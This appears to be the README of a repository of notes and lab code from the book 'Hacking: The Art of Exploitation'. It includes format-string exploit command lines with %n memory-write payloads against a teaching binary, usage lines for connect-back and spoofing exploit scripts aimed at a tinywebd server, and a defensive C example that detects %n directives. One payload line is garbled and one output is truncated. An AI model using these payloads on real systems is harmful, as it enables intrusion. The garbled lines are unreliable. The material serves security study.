Hacking The Art Of Exploitation notes with samples and demos.

List of files and folders:

1. Exploitation:
– Generalized Exploit Techniques
– Buffer Overflows
– Stack-Based Buffer Overflow Vulnerabilities
– Experimenting with BASH + Perl
– Overflows in Other Segments
– Overflowing Function Pointers
– Format Strings
– Direct Parameter Access
– Detours with .dtors

Disassembly of section .plt (sample output)

– Overwriting the Global Offset Table

2. Networking Exploitation:

Sniffing on device eth0 (sample output)

– OSI Model
– Sockets
– Network Byte Order
– Internet Address Conversion
– A Simple Server Example
– A Web Client Example
– A Tinyweb Server
– Peeling Back the Lower Layers:
— Data-link Layer
— Network Layer
— Transport Layer
– Network Sniffing:
— Raw Socket Sniffer
— libpcap sniffer
— Decoding the Layers
— Active Sniffing

Installation:
– git clone https://github.com/surfuga/HackingTheArtOfExploitation-notes
– cd HackingTheArtOfExploitation-notes/ipspoofer/booksrc
– compile the sources you need (one at a time)

Example Writing to Arbitrary Memory Addresses:
– gcc -o fmt_vuln fmt_vuln.c
– ./fmt_vuln $(printf "\x94\x97\x04\x08\x95\x97\x04\x08\x96\x97\x04\x08\x97\x97\x04\x08")%x%x%x%n%n%_$(perl -e 'print "A"x220')_ n%nmemorys
– ./fmt_vuln $(printf "\x94\x97\x04\x08JUNK\x95\x97\x04\x08JUNK\x96\x97\x04\x08JUNK\x97\x97\x04\x08")%x%x%161x%n%222x%n%91x%n%258%n

– gdb -q --batch -ex "p 0xaa - 52 + 8"

– gdb prints: $1 = 126

– ./getenvaddr SHELLCODE ./fmt_vuln
– SHELLCODE will be at 0x4

./notetaker BBBB.%x.%x.%x.%x
output:

[DEBUG] buffer @ 0x9ccf008: 'BBBB.%x.%x.%x.%x'
[DEBUG] datafile @ 0x9ccf070: '/var/notes'
[DEBUG] file descriptor is 3
Note has been saved
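The notetaker output above shows the buffer printed as data, so the `%x` directives inside it are not expanded; the fmt_vuln commands earlier rely on the opposite (the buffer used as the format string itself). The C below is an added example, not code from the book or this repo: `render_note` is the hardened print (fixed `"%s"` format, buffer passed as an argument), and the two checker functions are hypothetical helpers that flag input carrying conversion directives, including the write directive `%n`, for logging or rejection.

```c
#include <stdio.h>
#include <string.h>
#include <stdbool.h>

/* Hardened form of the debug print: the user's buffer is an argument to a
 * fixed "%s" format, so "%x" or "%n" inside it is never interpreted.
 * Returns the number of characters rendered (like snprintf). */
int render_note(char *out, size_t outlen, const char *buffer) {
    return snprintf(out, outlen, "[DEBUG] buffer: '%s'", buffer);
}

/* Counts conversion directives in untrusted text. "%%" is a literal
 * percent sign and is not counted. Useful for logging suspicious input
 * before it reaches any printf-family call. */
int count_directives(const char *s) {
    int n = 0;
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }   /* escaped percent */
        n++;
    }
    return n;
}

/* True if the text contains a "%n" directive, optionally preceded by a
 * width or an N$ direct-parameter prefix. %n is the one conversion that
 * writes to memory instead of reading; detection only, the fix is
 * render_note above. */
bool has_write_directive(const char *s) {
    for (const char *p = s; *p; p++) {
        if (*p != '%') continue;
        if (p[1] == '%') { p++; continue; }
        const char *q = p + 1;
        while (*q == '$' || (*q >= '0' && *q <= '9')) q++;  /* width / N$ */
        if (*q == 'n') return true;
    }
    return false;
}

int main(void) {
    char line[128];
    const char *input = "BBBB.%x.%x.%x.%x";   /* constructed, from the notetaker run */
    render_note(line, sizeof line, input);
    puts(line);
    printf("directives=%d, has %%n=%d\n",
           count_directives(input), (int)has_write_directive("%x%x%161x%n"));
    return 0;
}
```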

Network exploitation:
First installation
– sudo apt-get install smbfs
– sudo mkdir /mnt/cifs
– sudo mount -t cifs //ip/sharefolder /mnt/cifs -o username=…,password=…,domain=…

Example Network Sniffing
– gcc -o pcap_sniff pcap_sniff.c -lpcap
– ./pcap_sniff
Decode:
– gcc -o decode_sniff decode_sniff.c -lpcap
– ./decode_sniff

Bash File Usage:
Usage: ./xtool_tinywebd_cback.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_reuse.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_silent.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_spoof.sh <shellcode file> <target IP>
Usage: ./xtool_tinywebd_steath.sh <shellcode file> <target IP>

Source : https://github.com/surfuga/